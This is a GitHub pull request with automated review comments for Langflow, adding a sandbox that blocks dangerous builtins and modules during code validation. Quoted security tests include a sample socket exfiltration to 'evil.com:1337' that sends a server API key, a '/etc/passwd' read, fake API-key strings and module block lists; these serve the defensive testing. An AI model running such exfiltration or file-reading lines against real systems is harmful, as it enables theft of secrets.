
feat(security): add configurable security levels for importing trusted builtins / modules #10696

Draft
jordanrfrazier wants to merge 44 commits into main from sandbox-validate-endpoint

Conversation

@jordanrfrazier
Collaborator

@jordanrfrazier jordanrfrazier commented Nov 24, 2025

Allows users to configure a security level that blocks builtins and modules with system-level access, such as eval and subprocess. The blocking applies during both validation and execution.

Does not block builtins or modules in core (trusted) components.

Note that this isn't a true isolated sandbox - Python does not provide that capability. Python processes generally rely on containers and virtualization to enforce security.

@coderabbitai
Contributor

coderabbitai Bot commented Nov 24, 2025

Important

Review skipped

Auto incremental reviews are disabled on this repository.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Walkthrough

This PR introduces a security sandbox for isolated Python code execution that blocks dangerous operations and modules by default, adds IBM watsonx.ai embedding model support with provider-specific configuration, and includes comprehensive security and integration tests. A new global setting controls whether dangerous code operations are permitted during validation.

Changes

| Cohort / File(s) | Summary |
| --- | --- |
| Sandbox Infrastructure: src/lfx/src/lfx/custom/sandbox.py, src/lfx/src/lfx/custom/validate.py, src/lfx/src/lfx/services/settings/base.py | Introduces SecurityViolation exception, blocked builtins/modules lists, and core sandbox functions: create_isolated_builtins(), create_isolated_import(), execute_in_sandbox(). Integrates sandboxed import and function execution into validation flow. Adds allow_dangerous_code_validation configuration setting (default: False). |
| Sandbox Testing: src/lfx/tests/unit/custom/test_sandbox_isolation.py, src/lfx/tests/unit/custom/test_sandbox_security.py | Comprehensive isolation tests (parent globals/locals, builtins mutation, namespace freshness, decorator isolation) and security tests (server secrets/credentials inaccessibility, exfiltration prevention via commands/network, module state isolation). |
| Code Validation Tests: src/backend/tests/unit/api/v1/test_validate.py, src/backend/tests/unit/utils/test_validate.py | Adds security-focused validation endpoint tests verifying dangerous import/builtin blocking, safe code execution, and allowed module families. Updates utility test function to replace path resolution with JSON-encoded data processing. |
| IBM watsonx.ai Integration: src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json | Adds IBM watsonx.ai provider support to EmbeddingModelComponent: fetch_ibm_models() utility, new inputs (truncate_input_tokens, input_text), provider-specific update_build_config() logic for model discovery and field visibility management. |

Sequence Diagram(s)

sequenceDiagram
    participant User as User Code
    participant Val as validate.py
    participant Sand as sandbox.py
    participant Builtins as Isolated Builtins
    participant Imports as Isolated Imports
    
    User->>Val: compile code snippet
    Val->>Val: create exec_globals
    Val->>Sand: execute_in_sandbox(code_obj, exec_globals)
    
    Sand->>Builtins: create_isolated_builtins()
    Sand->>Imports: create_isolated_import()
    
    note over Sand: Prepare isolated environment
    Sand->>Sand: merge safe exec_globals
    Sand->>Sand: set __builtins__ to isolated
    Sand->>Sand: set __name__ and other attrs
    
    rect rgba(255, 200, 0, 0.2)
        note over Sand: Execute compiled code with isolation
        Sand->>User: exec(code_obj, isolated_globals)
    end
    
    alt Code attempts dangerous operation
        Builtins-->>Sand: raise SecurityViolation
        Sand-->>Val: SecurityViolation caught
        Val-->>User: validation fails
    else Code is safe
        User->>Imports: import langflow
        Imports-->>User: allowed (in safe list)
        Sand-->>Val: execution completes
        Val-->>User: validation succeeds
    end
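The flow in the diagram above can be approximated with a small stdlib-only sketch. This is not the PR's sandbox.py: the names BlockedOperationError, guarded_import, make_builtins, and run_isolated, and the contents of both blocked sets, are assumptions chosen for illustration. As the PR description notes, this kind of filtering is not a true isolation boundary.

```python
import builtins

# Hypothetical block lists; the PR's real lists live in sandbox.py.
BLOCKED_BUILTINS = {"eval", "exec", "compile", "open"}
BLOCKED_MODULES = {"os", "subprocess", "socket"}


class BlockedOperationError(Exception):
    """Raised when isolated code touches a blocked builtin or module."""


def _blocked(name):
    """Return a stand-in callable that refuses to run the named builtin."""
    def raiser(*args, **kwargs):
        msg = f"builtin '{name}' is blocked"
        raise BlockedOperationError(msg)
    return raiser


def guarded_import(name, globals=None, locals=None, fromlist=(), level=0):
    """Import hook that rejects blocked top-level packages."""
    # Only the top-level package is checked, so "os.path" is blocked with "os".
    if name.split(".")[0] in BLOCKED_MODULES:
        msg = f"module '{name}' is blocked"
        raise BlockedOperationError(msg)
    return builtins.__import__(name, globals, locals, fromlist, level)


def make_builtins():
    """Copy the real builtins, swapping blocked entries for raisers."""
    safe = {k: v for k, v in vars(builtins).items() if k not in BLOCKED_BUILTINS}
    safe.update({name: _blocked(name) for name in BLOCKED_BUILTINS})
    safe["__import__"] = guarded_import
    return safe


def run_isolated(source, extra_globals=None):
    """Execute source in a fresh namespace with the filtered builtins."""
    env = dict(extra_globals or {})
    env["__builtins__"] = make_builtins()
    env["__name__"] = "__sandbox__"
    exec(compile(source, "<sandbox>", "exec"), env)
    return env
```

Calling run_isolated("import math") succeeds, while run_isolated("import subprocess") raises BlockedOperationError. Copying the full builtins dict keeps __build_class__ available, so class definitions still work inside the isolated namespace.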
sequenceDiagram
    participant Client as Client Request
    participant API as /api/v1/validate/code
    participant Handler as Validation Handler
    participant Sandbox as Sandbox Executor
    participant Config as Settings
    
    Client->>API: POST user_code
    API->>Config: check allow_dangerous_code_validation
    
    rect rgba(100, 200, 100, 0.2)
        note over Config: Default: False (block dangerous)
    end
    
    API->>Handler: validate(code, dangerous_allowed=False)
    
    Handler->>Handler: parse AST
    Handler->>Sandbox: execute imports in sandbox
    Handler->>Sandbox: execute functions in sandbox
    
    alt Dangerous operation detected
        rect rgba(255, 100, 100, 0.2)
            Sandbox-->>Handler: SecurityViolation
            Handler-->>API: 422 validation error
        end
    else Safe code
        rect rgba(100, 200, 100, 0.2)
            Sandbox-->>Handler: execution succeeds
            Handler-->>API: 200 validation passed
        end
    end
    
    API-->>Client: response
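A rough sketch of the request flow in the second diagram follows. It checks imports statically with ast rather than executing anything, which is a simplification of what the diagram describes. The function names, the result shape (separate imports and function error lists), and the blocked set are assumptions, not the endpoint's actual code.

```python
import ast

BLOCKED_MODULES = {"os", "subprocess", "socket"}  # hypothetical list


def validate_source(source: str, *, dangerous_allowed: bool = False) -> dict:
    """Parse the code and report imports of blocked modules."""
    result = {"imports": {"errors": []}, "function": {"errors": []}}
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        result["function"]["errors"].append(str(exc))
        return result

    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            if not dangerous_allowed and name.split(".")[0] in BLOCKED_MODULES:
                result["imports"]["errors"].append(f"module '{name}' is blocked")
    return result


def status_code(result: dict) -> int:
    """Map a validation result to the HTTP status shown in the diagram."""
    has_errors = result["imports"]["errors"] or result["function"]["errors"]
    return 422 if has_errors else 200
```

With the default dangerous_allowed=False, code containing "import os" maps to 422. Passing dangerous_allowed=True models the override setting and lets the same code through.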

Estimated code review effort

🎯 4 (Complex) | ⏱️ ~50 minutes

Areas requiring extra attention:

  • Security sandbox implementation (src/lfx/src/lfx/custom/sandbox.py) — Verify correctness of builtins isolation, import blocking mechanism, and builtins proxy to prevent sandbox escape; examine exception handling and fallback behavior.
  • Integration into validation flow (src/lfx/src/lfx/custom/validate.py) — Ensure sandboxed execution is correctly wired for both imports and function definitions; verify exec_globals context creation and error propagation.
  • Configuration setting propagation (src/lfx/src/lfx/services/settings/base.py) — Confirm that allow_dangerous_code_validation is properly threaded through to sandbox initialization and respects default-safe semantics.
  • Comprehensive test coverage (src/lfx/tests/unit/custom/test_sandbox_*.py) — Review assertion quality across isolation tests; verify security tests adequately cover exfiltration vectors and module state semantics.

Possibly related PRs

Suggested labels

enhancement, security, size:XXL

Suggested reviewers

  • ogabrielluiz
  • edwinjosechittilappilly

Pre-merge checks and finishing touches

❌ Failed checks (1 error, 3 warnings)
| Check name | Status | Explanation | Resolution |
| --- | --- | --- | --- |
| Test Coverage For New Implementations | ❌ Error | Tests contain critical structural issues: execute_in_sandbox doesn't populate exec_globals, hard-coded API keys trigger scanners, and 'requests' is in BLOCKED_MODULES. | Refactor tests to move function calls into sandboxed code strings, replace hard-coded keys with non-realistic values, remove 'requests' from BLOCKED_MODULES or use a different library, and fix Ruff violations. |
| Test Quality And Coverage | ⚠️ Warning | Pull request contains significant test quality and coverage issues preventing proper validation of sandbox implementation. | Fix broken test logic in test_sandbox_isolation.py and test_sandbox_security.py, resolve contradictory module blocking policy in test_validate.py, fix Ruff violations, add build_class to builtins, and apply asyncio.to_thread() for synchronous fetch_ibm_models() calls. |
| Test File Naming And Structure | ⚠️ Warning | Tests have critical structural flaws: exec_globals access will fail with KeyError, unused variables present, and fake API keys match real patterns triggering security scanners. | Move function calls into code strings for proper NameError raising, remove unused variables, replace 'sk-' prefixed keys with non-matching alternatives, and verify blocked modules in test expectations. |
| Title check | ⚠️ Warning | The PR title describes adding configurable security levels for trusted imports/modules, but the actual changes focus on implementing a comprehensive security sandbox for code validation with dangerous operation blocking, not configurable trust levels. | Update the title to better reflect the main change, such as 'feat(security): implement sandbox isolation for code validation endpoint' or 'feat(security): add sandbox with blocked dangerous operations for code validation'. |
✅ Passed checks (3 passed)
| Check name | Status | Explanation |
| --- | --- | --- |
| Docstring Coverage | ✅ Passed | Docstring coverage is 86.49% which is sufficient. The required threshold is 80.00%. |
| Excessive Mock Usage Warning | ✅ Passed | Test files demonstrate excellent test design with minimal and appropriate mock usage, focusing on real behavior verification. |
| Description Check | ✅ Passed | Check skipped - CodeRabbit’s high-level summary is enabled. |
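One of the resolutions in the failed checks suggests asyncio.to_thread() for the synchronous fetch_ibm_models() calls. The signature of fetch_ibm_models() is not shown on this page, so the sketch below uses a hypothetical stand-in, fetch_models_blocking, to show the general pattern of moving a blocking call off the event loop.

```python
import asyncio
import time


def fetch_models_blocking(delay: float = 0.05) -> list[str]:
    """Hypothetical stand-in for a synchronous, network-bound model lookup."""
    time.sleep(delay)  # simulates blocking I/O
    return ["model-a", "model-b"]


async def fetch_models() -> list[str]:
    """Run the blocking call in a worker thread so the event loop stays free."""
    return await asyncio.to_thread(fetch_models_blocking)
```

asyncio.to_thread() is available from Python 3.9 onward, which covers the 3.10 to 3.13 versions listed in the CI checks on this PR.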


Comment @coderabbitai help to get the list of available commands and usage tips.

@codecov

codecov Bot commented Nov 24, 2025

Codecov Report

❌ Patch coverage is 72.25434% with 48 lines in your changes missing coverage. Please review.
✅ Project coverage is 33.10%. Comparing base (1769b0f) to head (c6b19f7).
⚠️ Report is 1 commit behind head on main.

| Files with missing lines | Patch % | Lines |
| --- | --- | --- |
| src/lfx/src/lfx/custom/validate.py | 4.34% | 22 Missing ⚠️ |
| src/lfx/src/lfx/custom/isolation/isolation.py | 79.24% | 8 Missing and 3 partials ⚠️ |
| src/lfx/src/lfx/custom/isolation/config.py | 84.31% | 6 Missing and 2 partials ⚠️ |
| src/lfx/src/lfx/custom/isolation/execution.py | 81.08% | 5 Missing and 2 partials ⚠️ |

❌ Your project check has failed because the head coverage (40.47%) is below the target coverage (60.00%). You can increase the head coverage or adjust the target coverage.

Additional details and impacted files

Impacted file tree graph

@@            Coverage Diff             @@
##             main   #10696      +/-   ##
==========================================
- Coverage   33.38%   33.10%   -0.28%     
==========================================
  Files        1399     1403       +4     
  Lines       66331    66470     +139     
  Branches     9794     9812      +18     
==========================================
- Hits        22142    22003     -139     
- Misses      43065    43336     +271     
- Partials     1124     1131       +7     
| Flag | Coverage Δ |
| --- | --- |
| frontend | 15.35% <ø> (ø) |

Flags with carried forward coverage won't be shown. Click here to find out more.

| Files with missing lines | Coverage Δ |
| --- | --- |
| src/lfx/src/lfx/custom/isolation/transformer.py | 100.00% <100.00%> (ø) |
| src/lfx/src/lfx/services/settings/base.py | 71.15% <100.00%> (+0.13%) ⬆️ |
| src/lfx/src/lfx/custom/isolation/execution.py | 81.08% <81.08%> (ø) |
| src/lfx/src/lfx/custom/isolation/config.py | 84.31% <84.31%> (ø) |
| src/lfx/src/lfx/custom/isolation/isolation.py | 79.24% <79.24%> (ø) |
| src/lfx/src/lfx/custom/validate.py | 38.23% <4.34%> (-2.05%) ⬇️ |

... and 61 files with indirect coverage changes


Contributor

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 9

🧹 Nitpick comments (2)
src/lfx/src/lfx/custom/validate.py (1)

74-85: Function definition now executed in sandbox — verify expectations for decorator/default‑arg errors

Executing each FunctionDef via execute_in_sandbox with _create_langflow_execution_context() is a good way to catch definition‑time errors (decorators, default args, annotations) without exposing server state. Just be aware this will also surface SecurityViolation (e.g., if decorators/imports inside the function hit blocked modules) through the generic except Exception path and report them as function["errors"]. Confirm that this mapping and logging ("Error executing function code") matches what the validate API and UI expect for blocked operations vs regular runtime errors.
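To illustrate the distinction raised here, the sketch below separates blocked operations from ordinary definition-time failures before the generic handler sees them. BlockedOperationError and classify_definition_error are hypothetical names, and the returned dict shape is an assumption, not what validate.py reports.

```python
class BlockedOperationError(Exception):
    """Hypothetical stand-in for the sandbox's security exception."""


def classify_definition_error(run):
    """Execute a zero-argument callable and label any failure it raises.

    Returns None on success, otherwise a dict with a 'kind' of either
    'security' (blocked operation) or 'runtime' (any other exception).
    """
    try:
        run()
    except BlockedOperationError as exc:
        # Caught first, so it is never folded into the generic branch.
        return {"kind": "security", "message": str(exc)}
    except Exception as exc:
        return {"kind": "runtime", "message": f"{type(exc).__name__}: {exc}"}
    return None


def define_with_bad_default():
    """Default arguments are evaluated when the def statement runs."""
    exec("def f(x=1 / 0):\n    return x\n", {})
```

classify_definition_error(define_with_bad_default) reports a runtime error even though f is never called, because the default value 1 / 0 is evaluated at definition time.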

src/backend/tests/unit/api/v1/test_validate.py (1)

183-209: Clean up W293 blank lines in docstrings for third‑party‑libs test.

Ruff reports W293 Blank line contains whitespace at line 184. That’s the empty line inside this docstring:

    """Test that third-party libraries (not in a whitelist) can be imported.
    
    Users should be able to import legitimate third-party libraries like AI libraries,
    ...
    """

You can fix it by removing the blank line or making it non‑blank:

-    """Test that third-party libraries (not in a whitelist) can be imported.
-    
-    Users should be able to import legitimate third-party libraries like AI libraries,
+    """Test that third-party libraries (not in a whitelist) can be imported.
+    Users should be able to import legitimate third-party libraries like AI libraries,

Same pattern applies to the docstrings around Lines 252 and 280; see next comment.

📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and 0328ae8.

⛔ Files ignored due to path filters (1)
  • uv.lock is excluded by !**/*.lock
📒 Files selected for processing (7)
  • src/backend/tests/unit/api/v1/test_validate.py (1 hunks)
  • src/backend/tests/unit/utils/test_validate.py (1 hunks)
  • src/lfx/src/lfx/custom/sandbox.py (1 hunks)
  • src/lfx/src/lfx/custom/validate.py (2 hunks)
  • src/lfx/src/lfx/services/settings/base.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_isolation.py (1 hunks)
  • src/lfx/tests/unit/custom/test_sandbox_security.py (1 hunks)
🧰 Additional context used
🧬 Code graph analysis (5)
src/lfx/src/lfx/custom/validate.py (1)
src/lfx/src/lfx/custom/sandbox.py (3)
  • create_isolated_import (140-173)
  • execute_in_sandbox (176-239)
  • isolated_import (149-171)
src/lfx/src/lfx/custom/sandbox.py (1)
src/backend/base/langflow/interface/importing/utils.py (1)
  • import_module (7-32)
src/lfx/tests/unit/custom/test_sandbox_isolation.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (176-239)
src/lfx/tests/unit/custom/test_sandbox_security.py (1)
src/lfx/src/lfx/custom/sandbox.py (1)
  • execute_in_sandbox (176-239)
src/backend/tests/unit/api/v1/test_validate.py (1)
src/backend/tests/conftest.py (1)
  • logged_in_headers (507-513)
🪛 GitHub Actions: Ruff Style Check
src/backend/tests/unit/api/v1/test_validate.py

[error] 101-101: Ruff: E501 Line too long (131 > 120). Line exceeds maximum line length.

🪛 GitHub Check: Ruff Style Check (3.13)
src/lfx/src/lfx/custom/sandbox.py

[failure] 16-16: Ruff (N818)
src/lfx/src/lfx/custom/sandbox.py:16:7: N818 Exception name SecurityViolation should be named with an Error suffix


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Set is deprecated, use set instead


[failure] 13-13: Ruff (UP035)
src/lfx/src/lfx/custom/sandbox.py:13:1: UP035 typing.Dict is deprecated, use dict instead
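For reference, the N818 and UP035 findings above usually come down to a rename and a switch to builtin generics. The sketch below assumes a renamed exception, SecurityViolationError, and a hypothetical helper, is_blocked; neither is taken from sandbox.py.

```python
from __future__ import annotations


class SecurityViolationError(Exception):
    """Same role as SecurityViolation, with the Error suffix N818 asks for."""


def is_blocked(name: str, blocked: set[str], aliases: dict[str, str]) -> bool:
    """Return True if name, after alias resolution, is in the blocked set.

    The annotations use builtin set and dict instead of typing.Set and
    typing.Dict, which is the change UP035 asks for.
    """
    return aliases.get(name, name) in blocked
```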

src/backend/tests/unit/api/v1/test_validate.py

[failure] 280-280: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:280:1: W293 Blank line contains whitespace


[failure] 268-268: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:268:121: E501 Line too long (127 > 120)


[failure] 252-252: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:252:1: W293 Blank line contains whitespace


[failure] 184-184: Ruff (W293)
src/backend/tests/unit/api/v1/test_validate.py:184:1: W293 Blank line contains whitespace


[failure] 134-134: Ruff (F841)
src/backend/tests/unit/api/v1/test_validate.py:134:5: F841 Local variable result is assigned to but never used


[failure] 133-133: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:133:121: E501 Line too long (121 > 120)


[failure] 101-101: Ruff (E501)
src/backend/tests/unit/api/v1/test_validate.py:101:121: E501 Line too long (131 > 120)

🪛 Gitleaks (8.29.0)
src/lfx/tests/unit/custom/test_sandbox_security.py

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)


[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (13)
  • GitHub Check: Lint Backend / Run Mypy (3.13)
  • GitHub Check: Lint Backend / Run Mypy (3.10)
  • GitHub Check: Lint Backend / Run Mypy (3.11)
  • GitHub Check: Lint Backend / Run Mypy (3.12)
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 5
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 4
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 1
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 2
  • GitHub Check: Run Backend Tests / Unit Tests - Python 3.10 - Group 3
  • GitHub Check: Run Backend Tests / Integration Tests - Python 3.10
  • GitHub Check: Run Backend Tests / LFX Tests - Python 3.10
  • GitHub Check: Test Starter Templates
  • GitHub Check: Update Component Index
🔇 Additional comments (2)
src/backend/tests/unit/utils/test_validate.py (1)

70-76: Typed function example looks consistent with sandboxed validation

Using from typing import List, Optional plus json/math inside process_data aligns with _create_langflow_execution_context (which seeds List/Optional into exec_globals), so annotation evaluation and import checks should pass without introducing new edge cases.

src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag aligns with sandbox env var; verify it’s actually wired through

Adding allow_dangerous_code_validation: bool = False with the LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION env mapping is consistent with the sandbox’s documented toggle. However, the sandbox currently appears to read the env var directly, while this Settings field is not obviously used to drive ALLOW_DANGEROUS_CODE. Please confirm that:

  • Setting this field (or the env var) actually affects the sandbox behavior used by /api/v1/validate/code, and
  • There’s no divergence between the value in Settings and the value the sandbox module uses at import time.

Comment thread src/lfx/tests/unit/custom/test_sandbox_security.py Outdated
Comment on lines +29 to +36
# Simulate server secrets stored in Python variables
server_api_key = "sk-secret-key-12345"
server_db_password = "db_password_secret"
server_config = {
"api_key": server_api_key,
"database_url": "postgresql://user:password@localhost/db"
}

Contributor

⚠️ Potential issue | 🟡 Minor

Hard‑coded “API key”‑like test strings will keep tripping secret scanners

Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.

A low‑friction fix is to tweak them so they no longer match common key patterns, e.g.:

  • "sk-test-not-a-real-key-12345"
  • "dummy-secret-key"

or similar, or centralize them in a constant that scanners are configured to ignore.

Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231
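A sketch of how such a test could look with a placeholder value that does not resemble a real key, and with the probing call placed inside the code string so the NameError is raised during execution. run_in_fresh_namespace is a hypothetical helper used only for illustration; it is not execute_in_sandbox.

```python
# Placeholder in the style the comment suggests; it does not match key patterns.
server_api_key = "dummy-secret-key"


def run_in_fresh_namespace(source: str) -> dict:
    """Execute source with globals that share nothing with this module."""
    env = {"__name__": "__sandbox__"}
    exec(compile(source, "<sandbox>", "exec"), env)
    return env


def leaks_server_variable() -> bool:
    """Return True if isolated code can read this module's server_api_key."""
    code = (
        "def probe():\n"
        "    return server_api_key\n"
        "result = probe()\n"  # the call happens inside the code string
    )
    try:
        run_in_fresh_namespace(code)
    except NameError:
        return False
    return True
```

Because the call to probe() is part of the executed string, the test does not need to pull anything back out of the execution globals to observe the NameError.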

🧰 Tools
🪛 Gitleaks (8.29.0)

[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

Contributor

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 9

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)

2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled.

Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.

-        BoolInput(
-            name="allow_dangerous_deserialization",
-            display_name="Allow Dangerous Deserialization",
-            ...
-            value=True,
-        ),
+        BoolInput(
+            name="allow_dangerous_deserialization",
+            display_name="Allow Dangerous Deserialization",
+            ...
+            value=False,
+        ),

If you must load untrusted indexes, gate with environment flag and warn prominently in UI.

🧹 Nitpick comments (6)
src/backend/tests/unit/utils/test_validate.py (1)

54-151: Consider adding dedicated sandbox security tests.

The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:

  1. Blocked operations - Verify that dangerous operations are blocked:

    • File system access (open(), os.remove(), os.system())
    • Subprocess execution (subprocess.run(), os.popen())
    • Network operations (socket, urllib, requests)
    • Module imports (__import__, importlib with dangerous modules)
  2. Allowed operations - Verify safe operations still work:

    • Standard math/string operations
    • Safe stdlib modules (math, json, typing, etc.)
  3. Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:

    • Setting can enable/disable dangerous operations
    • Setting is respected by validation logic
  4. Error handling - Verify appropriate errors are raised when blocked operations are attempted

Example test structure:

# Assumes validate_code is already imported at the top of this test module.
class TestSandboxSecurity:
    """Test cases for sandbox security restrictions."""

    def test_blocks_file_operations(self):
        """Test that file operations are blocked in sandbox."""
        code = '''
def dangerous_func():
    with open('/etc/passwd', 'r') as f:
        return f.read()
'''
        result = validate_code(code)
        # Normalize once so the assertion stays within the line-length limit.
        errors = str(result["function"]["errors"]).lower()
        assert len(result["function"]["errors"]) > 0
        assert "blocked" in errors or "not allowed" in errors

    def test_allows_safe_operations(self):
        """Test that safe operations are allowed."""
        code = '''
import math
import json

def safe_func(x):
    return json.dumps({"result": math.sqrt(x)})
'''
        result = validate_code(code)
        assert result["imports"]["errors"] == []
        assert result["function"]["errors"] == []
src/lfx/src/lfx/services/settings/base.py (1)

339-349: Config flag wiring for dangerous validation looks consistent

The new allow_dangerous_code_validation flag is sane: defaulting to False, clearly documented, and aligned with env_prefix="LANGFLOW_" so LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION works as described. One thing to be aware of: the sandbox currently reads this env var once at import time, so changing this setting at runtime via Settings won’t affect ALLOW_DANGEROUS_CODE without a restart. If you expect dynamic toggling, wiring the sandbox flag through Settings (or re-reading on demand) would help, otherwise this behavior is fine as a static boot‑time switch.
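The difference between a boot-time switch and an on-demand read can be sketched as follows. The environment variable name comes from this PR; ALLOW_AT_IMPORT, allow_dangerous_code, and the accepted truthy strings are assumptions for illustration.

```python
import os

ENV_VAR = "LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION"


def _parse_bool(raw):
    """Assumed parsing rule: a few common truthy spellings, case-insensitive."""
    return (raw or "").strip().lower() in {"1", "true", "yes"}


# Import-time snapshot: later changes to the environment are not seen.
ALLOW_AT_IMPORT = _parse_bool(os.environ.get(ENV_VAR))


def allow_dangerous_code() -> bool:
    """On-demand read: reflects the environment at call time."""
    return _parse_bool(os.environ.get(ENV_VAR))
```

A module-level constant like ALLOW_AT_IMPORT keeps whatever value it had when the module was first imported, which is the static behavior described above. A function like allow_dangerous_code() would pick up later changes without a restart.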

src/lfx/tests/unit/custom/test_sandbox_security.py (3)

3-13: Clarify relationship between namespace isolation and dangerous‑code flag

The module docstring currently states that sandboxed code can access filesystem, env, network, and commands without qualification, but execute_in_sandbox is documented as blocking these by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true is set. It would be clearer (and less misleading for future readers) to explicitly mention that this “CAN access” behavior assumes the dangerous‑code flag is enabled, and that by default those operations are blocked while namespace isolation still applies.


217-237: Avoid real outbound network connections in tests

In test_sandbox_cannot_exfiltrate_secrets_via_network, the sandboxed code calls:

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('evil.com', 1337))
s.send(server_api_key.encode())

Even though you intend a NameError on server_api_key, the socket.connect happens before that lookup, so the test will attempt a real outbound TCP connection to evil.com. This can make tests slow, flaky, or surprising in constrained CI environments.

You can keep the exfiltration intent while avoiding actual network calls by reordering or simplifying:

-def test():
-    # Code CAN make network requests
-    # But code CANNOT access server_api_key to send
-    # If isolation is broken, we could do: socket.send(server_api_key.encode())
-    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    s.connect(('evil.com', 1337))
-    s.send(server_api_key.encode())  # Try to send server secret
-    s.close()
-    return 'sent'
+def test():
+    # Code COULD make network requests, but here we focus on the secret access.
+    # The NameError on server_api_key should occur before any actual network I/O.
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    # No real connect; just reference the would‑be secret.
+    s.send(server_api_key.encode())  # Try to send server secret
+    s.close()
+    return 'sent'

This still proves that sandboxed code cannot obtain server_api_key, without touching the network.
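The ordering argument can be checked without any network access by handing the code a recording stub in place of a real socket. RecordingSocket and attempt_exfiltration are hypothetical names for this sketch.

```python
class RecordingSocket:
    """Stub that records calls instead of performing network I/O."""

    def __init__(self):
        self.calls = []

    def connect(self, address):
        self.calls.append(("connect", address))

    def send(self, data):
        self.calls.append(("send", data))
        return len(data)

    def close(self):
        self.calls.append(("close",))


def attempt_exfiltration(sock) -> str:
    """Run code that tries to send a name it has no access to."""
    code = "sock.send(server_api_key.encode())\n"
    try:
        exec(code, {"sock": sock})
    except NameError:
        return "blocked"
    return "sent"
```

Python evaluates the argument expression before invoking send, so the NameError on server_api_key is raised first and the stub's call list stays empty.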


252-285: Test name/docstring don’t match behavior in test_sandbox_cannot_access_imported_server_modules_state

The test name and docstring say it verifies that sandboxed code “gets fresh module instances, not server’s module state”, but the inline comments and assertion now acknowledge that json is actually shared and only check that result is a str. As written, the test does not meaningfully validate isolation of imported module state.

Either:

  • Align the behavior with the name/docstring, e.g. assert that result reflects unmodified json.dumps, or
  • Rename the test and update comments to describe the actual property you care about (e.g., “sandbox can import and use json even if server mutates it; isolation is about Python variables, not module state”), and simplify the setup.

Cleaning this up will make the security guarantees and limitations around module‑level state much clearer for future maintainers.
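The sharing of module state can be demonstrated with plain exec, independent of the sandbox code in this PR. Imported modules are cached in sys.modules, so code executed in a fresh namespace sees the same module object the host process has. module_state_is_shared is a hypothetical helper written for this illustration.

```python
import json


def module_state_is_shared() -> bool:
    """Patch json.dumps in the host, then check what isolated code sees."""
    original = json.dumps
    json.dumps = lambda *args, **kwargs: "patched"
    try:
        env = {}
        # A fresh globals dict, yet "import json" returns the cached module.
        exec("import json\nresult = json.dumps({'a': 1})\n", env)
        return env["result"] == "patched"
    finally:
        json.dumps = original  # always restore the real function
```

The function returns True: namespace isolation hides Python variables from the executed code, but it does not give that code fresh module instances.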

src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)

2231-2249: Guardrail: validate truncate_input_tokens before passing to SDK.

Prevent invalid/negative values from reaching the IBM params.

Within build_embeddings IBM branch:

-            params = {
-                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,
+            safe_trunc = max(0, int(self.truncate_input_tokens or 0))
+            params = {
+                EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: safe_trunc,
                 EmbedTextParamsMetaNames.RETURN_OPTIONS: {"input_text": self.input_text},
             }
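The same guard can be pulled into a small helper, sketched below. The fallback to 0 for non-numeric input is an added assumption; the one-line expression in the suggestion above would raise on such input instead. safe_truncate_tokens is a hypothetical name.

```python
def safe_truncate_tokens(value) -> int:
    """Coerce a user-supplied token limit to a non-negative int."""
    try:
        tokens = int(value or 0)
    except (TypeError, ValueError):
        # Assumption: treat unparseable input as "no limit set".
        return 0
    return max(0, tokens)
```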
📜 Review details

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6f6c9a7 and b574590.

⛔ Files ignored due to path filters (1)
